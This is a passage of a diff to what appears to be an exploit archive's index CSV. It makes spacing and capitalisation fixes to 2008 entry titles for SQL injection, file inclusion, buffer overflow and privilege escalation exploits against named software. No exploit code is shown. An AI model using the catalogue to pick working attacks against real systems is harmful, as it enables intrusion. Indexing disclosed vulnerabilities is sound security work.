Injection",2008-10-10,LUPUS,asp,webapps,0 @@ -6303,19 +6304,19 @@ id,file,description,date,author,platform,type,port 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 -6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat'SQL Injection",2008-10-12,Hakxer,php,webapps,0 +6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0 6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service",2008-10-12,dmnt,windows,dos,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0 -6742,platforms/windows/dos/6742.py,"RaidenFTPD 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos,0 +6742,platforms/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos,0 6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution Exploit",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion Exploit",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0 -6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - 'index.php no'SQL Injection",2008-10-14,EcHoLL,php,webapps,0 +6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - 'index.php no' SQL Injection",2008-10-14,EcHoLL,php,webapps,0 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 @@ -6353,7 +6354,7 @@ id,file,description,date,author,platform,type,port 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - (fckeditor) Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 -6786,platforms/solaris/remote/6786.pl,"Solaris 9 - [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 +6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0 6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 @@ -6375,8 +6376,8 @@ id,file,description,date,author,platform,type,port 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (ajax.php) SQL Injection (Post-Authenticated)",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 -6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx'SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 -6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat'SQL Injection",2008-10-22,"Hussin X",php,webapps,0 +6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 +6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - sftp realpath Remote Buffer Overflow PoC (Post-Authenticated)",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 @@ -6394,7 +6395,7 @@ id,file,description,date,author,platform,type,port 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 -6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url'SQL Injection",2008-10-24,yassine_enp,php,webapps,0 +6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 @@ -6419,7 +6420,7 @@ id,file,description,date,author,platform,type,port 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 -6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) SQL Injection",2008-10-27,ExSploiters,php,webapps,0 +6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 @@ -6482,16 +6483,16 @@ id,file,description,date,author,platform,type,port 6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,php,webapps,0 6916,platforms/php/webapps/6916.txt,"ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps,0 6917,platforms/php/webapps/6917.php,"Article Publisher PRO - (userid) SQL Injection",2008-10-31,Stack,php,webapps,0 -6918,platforms/php/webapps/6918.txt,"SFS EZ Auction - 'viewfaqs.php cat'Blind SQL Injection",2008-10-31,Stack,php,webapps,0 -6919,platforms/php/webapps/6919.txt,"SFS EZ Career - 'content.php topic'SQL Injection",2008-10-31,Stack,php,webapps,0 -6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - 'topsite.php ts'SQL Injection",2008-10-31,Stack,php,webapps,0 +6918,platforms/php/webapps/6918.txt,"SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection",2008-10-31,Stack,php,webapps,0 +6919,platforms/php/webapps/6919.txt,"SFS EZ Career - 'content.php topic' SQL Injection",2008-10-31,Stack,php,webapps,0 +6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - 'topsite.php ts' SQL Injection",2008-10-31,Stack,php,webapps,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - writeFile() API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0 6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - (where) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 -6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'directory.php cat'SQL Injection",2008-11-01,Hakxer,php,webapps,0 +6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0 -6927,platforms/php/webapps/6927.txt,"AJ ARTICLE - 'featured_article.php mode'SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 +6927,platforms/php/webapps/6927.txt,"AJ ARTICLE - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 @@ -6516,8 +6517,8 @@ id,file,description,date,author,platform,type,port 6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion - 'tr.php id' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - 'tr.php id' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 -6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - 'index.php c'Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 -6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php cat'SQL Injection",2008-11-02,JosS,php,webapps,0 +6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php cat' SQL Injection",2008-11-02,JosS,php,webapps,0 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0 6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0 6956,platforms/php/webapps/6956.txt,"apartment search script - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 @@ -6565,7 +6566,7 @@ id,file,description,date,author,platform,type,port 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 -7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg'SQL Injection",2008-11-05,G4N0K,php,webapps,0 +7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - (Authentication Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0 @@ -6611,7 +6612,7 @@ id,file,description,date,author,platform,type,port 7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0 -7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 - '.rt'Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 +7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 @@ -6686,7 +6687,7 @@ id,file,description,date,author,platform,type,port 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0 -7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list'Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 +7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 @@ -6732,7 +6733,7 @@ id,file,description,date,author,platform,type,port 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 7179,platforms/php/webapps/7179.txt,"NatterChat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 -7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb'Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 +7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 @@ -6781,12 +6782,12 @@ id,file,description,date,author,platform,type,port 7231,platforms/php/webapps/7231.txt,"fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 -7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type'Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 +7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 -7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr'SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 +7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"web Calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 @@ -6806,7 +6807,7 @@ id,file,description,date,author,platform,type,port 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 -7260,platforms/php/webapps/7260.txt,"BaSiC-CMS - 'acm2000.mdb'Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 +7260,platforms/php/webapps/7260.txt,"BaSiC-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 @@ -6852,8 +6853,8 @@ id,file,description,date,author,platform,type,port 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - (.EWB) Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 -7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 -7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp'Stack Overflow",2008-11-30,SkD,windows,local,0 +7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 +7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 @@ -6863,7 +6864,7 @@ id,file,description,date,author,platform,type,port 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 -7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - DD / SQL / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 +7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component GuestBook - Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 @@ -6871,7 +6872,7 @@ id,file,description,date,author,platform,type,port 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) SQL Injection",2008-12-03,"CWH Underground",php,webapps,0 -7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp'Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 +7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 @@ -6880,9 +6881,9 @@ id,file,description,date,author,platform,type,port 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 -7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb'Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 +7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 7339,platforms/php/webapps/7339.txt,"template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0 -7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb'Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 +7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 - (directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 @@ -6891,11 +6892,11 @@ id,file,description,date,author,platform,type,port 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed PE File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 -7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID'SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7350,platforms/asp/webapps/7350.txt,"RankEm - (Authentication Bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 -7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb'Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 +7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - SITE Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 @@ -6903,7 +6904,7 @@ id,file,description,date,author,platform,type,port 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 -7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - 'xportal.mdb'Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 +7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - 'xportal.mdb' Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0 